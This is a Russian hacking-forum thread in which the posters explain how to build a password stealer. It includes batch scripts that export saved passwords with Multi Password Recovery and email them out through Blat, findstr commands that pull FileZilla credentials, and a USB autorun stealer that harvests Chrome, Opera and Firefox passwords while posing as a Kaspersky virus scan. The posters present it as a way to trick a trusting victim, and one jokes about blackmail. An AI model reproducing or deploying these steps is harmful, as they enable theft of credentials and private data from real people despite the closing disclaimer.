ВАЖНО Делаем простенький стилер сами

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 31 янв 2014.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Давайте творчески подойдём к процессу и попробуем сделать из легальной программы, например Multi Password Recovery (MPR) программу для кражи всех паролей с компа (Стилер). Dmeh-Smeh-Smeh!!!

    Вы сейчас скажите, ой-ай, чо херню несёшь, а херню-ли, рассказываю как сделать:

    1) Первое что нам нужно это сам MPR. качаем по ссылке http://www.passrecovery.com/
    установим MPR в отдельную папку. установили?

    2)Удаляем установку- должно остаться 6 файлов, качаем blat: http://sourceforge.net/projects/blat/files/Blat Full Version/Blat v2.6.2/blat262.full.zip/download

    Blat это маленькая open source консольная програмулька под Windows, которая позволяет отправлять e-Mail по SMTP протоколу из командной строки.

    3)Архив распаковываем в ту же папку с MPR:

    Создаем файл 1.bat открываем с помощью Блокнота и вводим содержимое:
    Код:
    @echo off
    :start
    ping ya
    .ru -n 5 >nul
    if %errorlevel%==(goto send) else (goto end)
    :
    end
    goto :start
    :send
    blat
    .exe -install -server smtp.yandex.ru -port 587 -f твой логин@yandex.ru -u логин -pw пароль
    mpr
    .exe /export
    ren 
    *.mpf pass.mpf
    blat
    .exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf
    del 
    %Temp%\*.* ///F
    Изменяем данные на свои.

    4)Сохраняем качаем программу http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.HТМL

    Это преобразование батника в exe с упаковкой нужных файлов, короче на подобие Джойнера, к сожалению она палится практически всеми АВ, ищем непалевный Джойнер на хак. сайтах !sm3888

    Открываем её . в batch file вводим файл 1.bat .

    В дереве visibility Ставим галку на второй чексбокс.

    5)Заходим на вкладку include нажимаем на кнопку add и выбераем файлы

    Код:
    HookLib.dll
    blat
    .lib
    blat
    .exe
    blat
    .dll
    MPR
    .exe
    И нажимаем Compile. Открываем файл и смотрим почту.



    :utenok: Dmeh-Smeh-Smeh!!! Dmeh-Smeh-Smeh!!! Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 8
  2. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.183
    Симпатии:
    11.096
    Пол:
    Мужской
    Репа:
    +11.244 / 47 / -6
    Jabber:
    Skype:
    Один только MPR палится на вирустотале 21 антивирусником)
     
    • Мне нравится Мне нравится x 6
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Может ещё что есть ?

    Важно, чтобы программа поддерживала команды через батник:
    Код:
    mpr.exe /export
    ren 
    *.mpf pass.mpf
    blat
    .exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf
    mpr.exe /export - делает экспорт паролей;
    ren *.mpf pass.mpf - переименовывает в pass.mpf

    blat.exe -bоdу PassReg -to кому отправлять@yandex.ru -attach pass.mpf - Строчка отправляет нам пароли pass.mpf !
     
    • Мне нравится Мне нравится x 5
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Кстати такой функционал не проблема реализовать обычным батником без всякого MPR, вот например гугл-хром, хранит пароли в C:\Users\SomeUser\AppData\Local\Google\Chrome\User Data\Default\Login Data

    Тырити файл Login Data батником и всё, файлзилла хранит здесь:C:\Users\Ваше имя\AppData\Roaming\FileZilla\recentservers.xml

    Всё разумеется не зашифрованно, короче, не храните пароли в браузерах и файлзилла !ohmy88
     
    • Мне нравится Мне нравится x 5
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Для теста своей защиты, в блокноте введите следующий код, и сохраните с расширением bat:
    Код:
    findstr /L “Pass User Host” %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml
    cmd
    .exe
    Данный код вытаскивает пароли из файлзилла, если есть нормальная защита, то должны получить запрет на доступ к папке Users, вот так:

    2.
     
    • Мне нравится Мне нравится x 7
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Блин очередное головотяпство, во первых в файлзилла пароли могут-быть и здесь:sitemanager.xml

    А во вторых не важная какая у вас защита пробить можно вводя без кавычик:“Pass User Host”.

    Пример, вводим такой код:
    Код:
        findstr /L Pass %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml
        cmd
    .exe
    Получаем пароль, никто даже не пискнул, ну OA конечно среагировал, задал алерт, ну и пох.:

    Безымянный.


    Далее сохранаем эти пароли в txt и пересылаем на почту, в целом если у жертвы нет проактивки, или ламер может и сработать, существует ещё вероятность, что жертва случайно нажмёт на "Рсзрешить" !Отдыхай!!!
     
    • Мне нравится Мне нравится x 6
  7. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.183
    Симпатии:
    11.096
    Пол:
    Мужской
    Репа:
    +11.244 / 47 / -6
    Jabber:
    Skype:
    Комодовская проактивка лишь подробно описала,какие действия хочет выполнить батник,но если не всматриваться в его алерты,то прокатит.Правда паролей у меня нет.
    Снимок.PNG
     
    • Мне нравится Мне нравится x 5
    • Согласен(а) Согласен(а) x 1
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А вот теперь бонус, как стырить все пароли на флешку:

    Идея вот в чём, приходите к красивой блондинке якобы проверить комп на вирусы, далее вставляет флешку с кашмарский антивирус, на флешке разумеется будет подготовленный софт, какой смотри ниже, короче когда флешка будет подключена, запуститься стиллер вместе со сканером кашмарского (Он запуститься для отвода глаз) и всё, все пароли у нас, потом заходим на почту блондинки и читаем её любовную переписку, а потом можно её шантажировать, если она откажется вас ещё пригласить...

    Это типа способ знакомства такой, именно поэтому меня никто и не приглашает чинить комп, особенно блондинки, видно боятся, репутация понимаете...Dmeh-Smeh-Smeh!!! sm3888

    Итак забыл самое главное сказать, как-же это всё сделать, а очень просто:

    1. Создаем на флэшке две папки:
    флэшка:\prog\
    флэшка:\prog\log\

    2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

    3. В корне флешки создаем autorun.inf со следующим содержанием:
    Код:
    [autorun]
    open=prog/hstart /NOCONSOLE "launch.bat"
    ACTIONПроверить комп на вирусы
    Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

    4. Создаем батник launch.bat:
    Код:
    echo off
    echo %computername%\%usernameЪte% %time% >> prog/log/_log.txt
    start prog
    /ChromePass.exe /stext prog/log/%computername%_chrom.txt
    start prog
    /OperaPassView.exe /stext prog/log/%computername%_Opera.txt
    If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
    start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
    :End
    start prog/KK.exe
    Рассмотрим команды батника поподробнее:

    echo off – запрет на вывод в окно CMD результатов выполнения

    echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

    start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

    Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

    start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

    Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.

    Весь софт во вложении, пароль:111

    И ещё:

    Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

    Данная статья написана исключительно в ознакомительных целях.
    Ее назначение - защита ваших данных от злоумышленника.
    Кто осведомлен, тот вооружен!
     

    Вложения:

    • Мне нравится Мне нравится x 8
  9. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.183
    Симпатии:
    11.096
    Пол:
    Мужской
    Репа:
    +11.244 / 47 / -6
    Jabber:
    Skype:
    Удобно.Хотя мне чаще к/т приносят домой и у меня есть время посмотреть всё что хочешь (но это совершенно не интересно,так как нет азарта).Сделаю такую флешечку ради эксперимента.Вот на HPC продают USB Stealer,но с большим функционалом (правда есть и бесплатная версия).
     
    • Мне нравится Мне нравится x 5
  10. Smouk Уважаемый пользователь
    Smouk
    Ответить в чате

    Форумчанин

    Регистрация:
    03.11.2013
    Сообщения:
    516
    Симпатии:
    2.708
    Пол:
    Мужской
    Репа:
    +2.723 / 0 / -0
    Этот способ актуален сейчас?) Я щас попробовал на своей системе запустить,ничего не стырил) От хрома только ссылку взял,для мозилы лог файл вобще не создает.
    PasswordFox.exe - ничего не показывает. Пусто там(
     
    • Мне нравится Мне нравится x 5
    • Информативный пост Информативный пост x 1

Поделиться этой страницей